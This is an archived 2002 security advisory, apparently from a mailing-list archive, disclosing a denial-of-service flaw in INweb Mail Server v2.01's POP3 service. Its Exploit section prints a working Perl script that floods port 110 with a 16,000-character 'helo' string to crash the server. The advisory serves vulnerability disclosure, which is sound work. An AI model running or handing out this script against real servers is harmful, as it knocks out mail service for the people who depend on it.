OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Tamer Sahin (ts_at_securityoffice.net)
Date: Tue Nov 12 2002 - 10:02:34 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: MD5

    - --[ INweb Mail Server v2.01 Denial of Service Vulnerability ]--

    - --[ Type

    Denial of Service

    - --[ Release Date

    November 12, 2002

    - --[ Product / Vendor

    The INweb Mail Server is a standard Internet POP3 and SMTP mail server that
    runs flawlessly under Windows 2000 and NT and other windows platforms.
    The INweb Mail Server provides numerous unique features for both small and
    large businesses as well as ISP's. This includes many facilities to handle spam
    and viruses.

    http://www.inwebmail.com

    - --[ Summary

    Memory corruption vulnerability exists in INweb Mail Server v2.01. The POP3
    server included with INweb Mail Server does not properly handle some types
    of requests. By submitting a maliciously crafted request to the POP3 server,
    an attacker could crash the system, resulting in a denial of service.

    - --[ Exploit

    An exploit for this vulnerability exists and is available below.

    ==================== SNIP ====================

    #!/usr/bin/perl -w

    use IO::Socket;

    $host = $ARGV[0];
    $port = "110";
    $evil = "A" x 16000;

    print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n";
    print "Usage: $0 host\n";
    print "Connecting...\n";
    $socket = IO::Socket::INET->
                new(Proto=>"tcp",
                PeerAddr=>$host,
                PeerPort=>$port)
                || die "Connection failed.\n";

    print "Attacking...\n";
    print $socket "helo:$evil\n\n";

    close($socket);
    print "\nConnection closed. Finished.\n\n";

    ==================== SNIP ====================

    - --[ Tested

    INweb Mail Server v2.01 / Windows 2000 sp3

    - --[ Vulnerable

    INweb Mail Server v2.01 / Windows 2000 sp3

    - --[ Disclaimer

    http://www.securityoffice.net is not responsible for the misuse or illegal use
    of any of the information and/or the software listed on this security advisory.

    - --[ Author

    Tamer Sahin
    tssecurityoffice.net
    http://www.securityoffice.net

    All our advisories can be viewed at http://www.securityoffice.net/articles/

    Please send suggestions, updates, and comments to feedbacksecurityoffice.net

    (c) 2002 SecurityOffice

    This Security Advisory may be reproduced and distributed, provided that this
    Security Advisory is not modified in any way and is attributed to SecurityOffice
    and provided that such reproduction and distribution is performed for
    non-commercial purposes.

    Tamer Sahin
    http://www.securityoffice.net

    -----BEGIN PGP SIGNATURE-----
    Version: 2.6

    iQEVAwUAPdEmHPpL5ibJRTtBAQHvDAf/YO13r8TkwFMuYEXgdHxaTmRtkUGn1CX2
    3biZlvU/9XU6Y36S3tPzVVQiQuhMcNJ3EyRMVHi5OcanrT6uOrp0jQExh5SRMPH/
    Y4wPN0Pm+f7gLLxAjp1uuvKR/NwaMTkgklrxAyM3Ek/kqS4Vh4t87d/nohAzOKa2
    nLoK2P39ngwTRF/Sg04xsAXDLd7/RQ/cC7z7I/DbFPa17OYBUhciw/+wYKe+bo4u
    FvXXPhcQnq8g8EJWfq1qHbEMYdXJrmhRudzIyVWQBSuw9+jX5qjvfh/09ZqS1I+Q
    Vvk556SO9/NF+mgMose0YZ/76Ck5ippZjgKzpppud1JfljV3D+YyiA==
    =z6ly
    -----END PGP SIGNATURE-----